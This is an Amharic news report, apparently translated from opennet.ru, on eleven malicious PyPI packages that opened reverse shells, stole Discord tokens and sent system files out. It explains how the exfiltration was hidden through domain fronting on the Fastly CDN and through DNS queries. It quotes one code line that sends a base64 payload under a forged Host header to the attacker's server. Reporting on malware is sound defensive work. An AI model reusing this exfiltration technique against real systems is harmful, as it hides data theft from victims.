በPyPI (Python Package Index) ማውጫ ውስጥ፣ ተንኮል አዘል ኮድ የያዙ 11 ጥቅሎች ተለይተዋል። ችግሮች ከመታወቁ በፊት ጥቅሎቹ በአጠቃላይ 38 ሺህ ጊዜ ያህል ወርደዋል. የተገኙት ተንኮል አዘል ፓኬጆች ከአጥቂዎቹ አገልጋዮች ጋር የመገናኛ መንገዶችን ለመደበቅ የተራቀቁ ዘዴዎችን በመጠቀማቸው ይታወቃሉ።
- importantpackage (6305 ማውረዶች)፣ አስፈላጊ-ጥቅል (12897) - ከ pypi.python.org ጋር በመገናኘት ከውጫዊ አገልጋይ ጋር ግንኙነት መሥርተው የሼል መዳረሻን ወደ ስርዓቱ (የተገላቢጦሽ ሼል) ለማቅረብ እና የ trevorc2 ፕሮግራሙን ለመደበቅ ተጠቅመዋል። የመገናኛ ሰርጥ.
- pptest (10001), ipboards (946) - ስለ ስርዓቱ መረጃ ለማስተላለፍ ዲ ኤን ኤስ እንደ የመገናኛ ሰርጥ ተጠቅሟል (በመጀመሪያው ፓኬት የአስተናጋጅ ስም, የስራ ማውጫ, የውስጥ እና የውጭ አይፒ, በሁለተኛው - የተጠቃሚ ስም እና የአስተናጋጅ ስም) .
- owlmoon (3285)፣ DiscordSafety (557)፣ yiffparty (1859) - በስርዓቱ ውስጥ ያለውን የዲስኮርድ አገልግሎት ማስመሰያ ለይተው ወደ ውጭ አስተናጋጅ ላከ።
- trrfab (287) - መለያውን ፣ የአስተናጋጁን ስም እና የ /etc/passwd ፣ /etc/hosts ፣/ቤትን ለውጫዊ አስተናጋጅ ላከ።
- 10Cent10 (490) - ከውጫዊ አስተናጋጅ ጋር የተገላቢጦሽ የሼል ግንኙነት አቋቋመ።
- yandex-yt (4183) - ስርዓቱ እየተጣሰ ስለመሆኑ መልእክት አሳይቷል እና በ nda.ya.ru (api.ya.cc) በኩል ስለተሰጡ ተጨማሪ እርምጃዎች ተጨማሪ መረጃ ወዳለው ገጽ እንዲዛወር አድርጓል።
በተለይ በPyPI ማውጫ ውስጥ ስራ ላይ የሚውለውን የፈጣን ይዘት ማቅረቢያ አውታረ መረብ እንቅስቃሴያቸውን ለመደበቅ በአስፈላጊው ጥቅል እና በአስፈላጊ ጥቅል ውስጥ ጥቅም ላይ የሚውሉ የውጭ አስተናጋጆችን የመድረስ ዘዴ ነው። በእርግጥ፣ ጥያቄዎች ወደ pypi.python.org አገልጋይ ተልከዋል (በSNI ውስጥ በ HTTPS ጥያቄ ውስጥ python.org የሚለውን ስም መግለጽን ጨምሮ)፣ ነገር ግን የኤችቲቲፒ “አስተናጋጅ” ራስጌ በአጥቂዎች ቁጥጥር ስር ያለውን የአገልጋይ ስም ያካትታል (ሰ. ወደፊት.io. global.prod.fastly.net). የይዘት ማቅረቢያ አውታረመረብ መረጃ በሚተላለፍበት ጊዜ የTLS ግንኙነትን ወደ pypi.python.org በመጠቀም ለአጥቂው አገልጋይ ተመሳሳይ ጥያቄ ልኳል።
የPyPI መሠረተ ልማት በፈጣን የይዘት ማቅረቢያ አውታረመረብ የተጎላበተ ሲሆን የተለመዱ ጥያቄዎችን ለመሸጎጥ የቫርኒሽ ግልጽ ፕሮክሲን ይጠቀማል እና እንዲሁም የኤችቲቲፒኤስ ጥያቄዎችን በተኪ በኩል ለማስተላለፍ ከመጨረሻ አገልጋዮች ይልቅ የTLS ሰርተፍኬት ሂደትን ይጠቀማል። የታለመው አስተናጋጅ ምንም ይሁን ምን, ጥያቄዎች ወደ ፕሮክሲው ይላካሉ, ይህም የሚፈለገውን አስተናጋጅ የሚወስነው የ HTTP "አስተናጋጅ" ራስጌን በመጠቀም ነው, እና የአስተናጋጁ የጎራ ስሞች ለሁሉም ፈጣን ደንበኞች ከተለመዱት የሲዲኤን ሎድ ሚዛን አይፒ አድራሻዎች ጋር የተሳሰሩ ናቸው.
የአጥቂዎቹ አገልጋይ በሲዲኤን በፍጥነት ይመዘገባል፣ ይህም ለሁሉም ሰው ነፃ እቅዶችን ይሰጣል እና ስም-አልባ ምዝገባንም ይፈቅዳል። "የተገላቢጦሽ ዛጎል" በሚፈጥሩበት ጊዜ ለተጎጂው ጥያቄዎችን ለመላክ, እቅድም ጥቅም ላይ ይውላል, ነገር ግን ከአጥቂው አስተናጋጅ ጎን መጀመሩ ትኩረት የሚስብ ነው. ከውጪ ከአጥቂዎቹ አገልጋይ ጋር ያለው መስተጋብር ከPyPI ማውጫ ጋር የPyPI TLS ሰርተፍኬት በመጠቀም የተመሰጠረ ህጋዊ ክፍለ ጊዜ ይመስላል። “የጎራ ፊት ለፊት” በመባል የሚታወቀው ተመሳሳይ ቴክኒክ ቀደም ሲል እገዳን በማለፍ የአስተናጋጁን ስም ለመደበቅ በንቃት ጥቅም ላይ ውሏል ፣ ይህም በአንዳንድ የሲዲኤን አውታረ መረቦች ውስጥ የተሰጠውን ችሎታ በመጠቀም በ SNI ውስጥ ምናባዊ አስተናጋጅ በማሳየት እና በእውነቱ ስሙን በማስተላለፍ HTTPS በTLS ክፍለ ጊዜ ውስጥ በ HTTP አስተናጋጅ ርዕስ ውስጥ አስተናጋጅ ጠይቋል።
ተንኮል አዘል እንቅስቃሴዎችን ለመደበቅ የTrevorC2 ጥቅል ከአገልጋዩ ጋር ከመደበኛው የድር አሰሳ ጋር ተመሳሳይ የሆነ መስተጋብር ለመፍጠር ጥቅም ላይ ውሏል፣ ለምሳሌ ምስሉን ለማውረድ በማስመሰል ተንኮል አዘል ጥያቄዎች ተልከዋል። guid=” ከመረጃ ኢንኮዲንግ ጋር በመመሪያ መለኪያ። url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r =ጥያቄ።ጥያቄ(url, headers = {'Host': "psc.forward.io.global.prod.fastly.net"})
የpptest እና ipboards ፓኬጆች የአውታረ መረብ እንቅስቃሴን ለመደበቅ የተለየ አቀራረብ ተጠቅመዋል፣ ይህም ለዲ ኤን ኤስ አገልጋይ በሚጠየቁ ጥያቄዎች ላይ ጠቃሚ መረጃን በኮድ ማስቀመጥ ላይ በመመስረት። ማልዌር መረጃን የሚያስተላልፈው እንደ "nu4timjagq4fimbuhe.example.com" ያሉ የዲ ኤን ኤስ ጥያቄዎችን በማከናወን ነው ወደ መቆጣጠሪያ አገልጋዩ የሚተላለፈው መረጃ በንኡስ ጎራ ስም የ base64 ፎርማት ተጠቅሟል። አጥቂው እነዚህን መልዕክቶች የሚደርሰው የዲ ኤን ኤስ አገልጋይ ለ example.com ጎራ በመቆጣጠር ነው።
ምንጭ: opennet.ru